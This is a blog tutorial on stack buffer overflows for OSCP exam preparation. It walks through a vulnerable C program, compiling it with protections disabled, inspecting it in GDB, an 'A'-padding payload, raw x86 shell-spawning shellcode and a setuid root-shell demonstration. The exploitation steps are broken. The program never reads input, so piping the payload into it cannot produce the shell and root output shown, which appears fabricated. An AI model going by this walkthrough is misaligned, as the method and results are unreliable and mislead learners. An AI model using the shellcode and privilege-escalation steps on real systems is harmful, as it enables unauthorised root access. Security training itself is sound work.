Cybersecurity professionals revere OSCP (Offensive Security Certified Professional) as the most elite, no nonsense certification in the pentesting industry. Of course, the exam earned that lofty reputation the fair way: OSCP is really hard. For example, the test always has at least one challenge that requires you to exploit a memory bug. Many beginners find this intimidating and only attempt the easier challenges. However, if you gain a solid understanding of buffer overflow exploits, you will have no problem with these supposedly “hard” buffer overflows.
That’s why we’ve made this guide. We want to give you the knowledge to confidently exploit memory bugs in any OSCP challenge so you can pass the exam more quickly and easily than otherwise. First, we’ll explain how buffer overflow challenges work in the context of the test, and why they’re so important. Then, we’ll begin learning the theory behind buffer overflows and exploit our first memory bug step-by-step. Finally, we’ll practice a variety of buffer overflow exploits on several different vulnerable programs until it becomes intuitive.
Let’s dive in!
Role of buffer overflows in the OSCP
When you take the exam for the OSCP, you will gain access to a network with five vulnerable machines on it. Each of these boxes has a different point value, showing its relative difficulty. To pass the test, you must win a certain quantity of points. The highest value box requires that you perform a memory exploit. As such, many less confident hackers avoid the highest point box. However, strong exploit artists go for this box first, to get a head start in points.
These points are “hard” for a reason: you need to have a basic idea of C and x86 assembly.
But thinking about the test will only invoke stress. Instead, put that energy towards learning! So let’s start doing precisely that – learning how a buffer overflow exploit works.
Learning buffer overflows
Alright, let’s talk about buffer overflows in a direct way. A buffer overflow occurs when a program writes more data to a buffer than it can hold. This often happens in C and other low-level languages, due to the lack of built-in bounds checking.
Let’s stat with this simple C program, as an example:
#include <stdio.h>
#include <string.h>
int main() {
char buffer[10];
strcpy(buffer, "ThisIsWayTooLongForTheBuffer");
printf("Buffer content: %s\n", buffer);
return 0;
}
In this code, the buffer is only meant to hold 10 chars, but the string being copied into it is much longer. This can overwrite adjacent memory, potentially leading to arbitrary code execution, crashing the program, or other unintended behaviors.
To exploit these kinds of vulns, attackers often inject their own code into the program, changing the execution flow to their code by overwriting a return address or similar core piece of data. Let’s start by building the code and exploring the problem more directly.
Finding the vulnerability
In practice, modern compilers and systems give a whole set of protections against buffer overflow exploits. However, this is irrelevant – the exam only expects you to do a simple memory exploit of a basic, traditionally vulnerable program. So don’t let yourself feel too intimidated!
To show the buffer overflow issue, we’ll compile the program with defense off and then use the GDB CLI tool to look at the behavior. You can compile the code on Linux with stack defense turned off using the following command:
gcc -o buffer_overflow_example buffer_overflow_example.c -fno-stack-protector -z execstack
This command disables stack protection and makes the stack exe, which is typically not ideal except for teaching purposes like this.
Now, run the program in GDB to see how the buffer overflow behaves:
gdb ./buffer_overflow_example
Within GDB, you can run the program and then examine the memory:
run
info registers
x/24wx $esp
This sequence will start the program, show the register states after crash (if it crashes), and display the contents near the stack pointer ($esp
), allowing you to see how the buffer overflow affects the stack.
Exploitation
Once we’ve found where in memory the instruction pointer is, we can write to the program automatically with Python:
python -c 'print("A"*76 + "\xef\xbe\xad\xde")' | ./buffer_overflow_example
And then, when we know the exact memory address, we can go straight for the kill and launch our buffer overflow attack. Note that this will vary based on CPU architecture. For this exercise, we’ll assume an x86 instruction set arch, but learn more in the section below on dealing with other architectures.
Let’s just echo in our shellcode and see what happens.
$ CODE="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80"
echo "$CODE" | ./buffer_overflow_example
$
If we hit CTRL + D to exit out of this shell, what do you expect to happen? Instead of closing our terminal, we will go back to the original terminal. In other words, we opened a new shell from within the buffer_overflow_example program! If this program had higher privileges than our user, we would assume those privs! And that’s exactly what the exam will expect you to do.
To visualize this more clearly, we can use setuid to make the program pop a root shell.
$ sudo chmod u+s buffer_overflow_example
$ echo "$CODE" | ./buffer_overflow_example
# whoami
root
How’s that for priv esc?
Note: there are tools you can use, like msfvenom, do help you figure out what shellcode you’ll need. ChatGPT helps a ton when developing certain exploits, but generally will not help you create shellcode, because it worries about the legal implications. In other words, it assumes you might be a blackhat. Anyway, we’ll link to more resources below!
Learn more about buffer overflows
Although the exercises above give us an intro into buffer overflows, you must not stop with this! If you hope to succeed in the rigorous OSCP exam. Rather, success means constant practice and work. So don’t give up – keep learning until hacking memory bugs is second nature.
To aid you in this quest, we’ve prepared some resources that will help you further your buffer overflow exploit skills:
- OSCP exam preparation tips
- Smashing The Stack For Fun And Profit
- Smashing the Stack in the 21st Century
- The Braindead Buffer Overflow Guide to Pass the OSCP Blindfolded
Furthermore, you can always get more practice hacking buffer overflow vulns via CTF games. Many such games specifically focus on challenges similar to what you’ll face during the OSCP exam, including memory exploitation.
I really hope you feel motivated to study hard and get to work, as that’s what the OSCP exam takes. So no matter what, never stop learning, and happy hacking!
Leave a Reply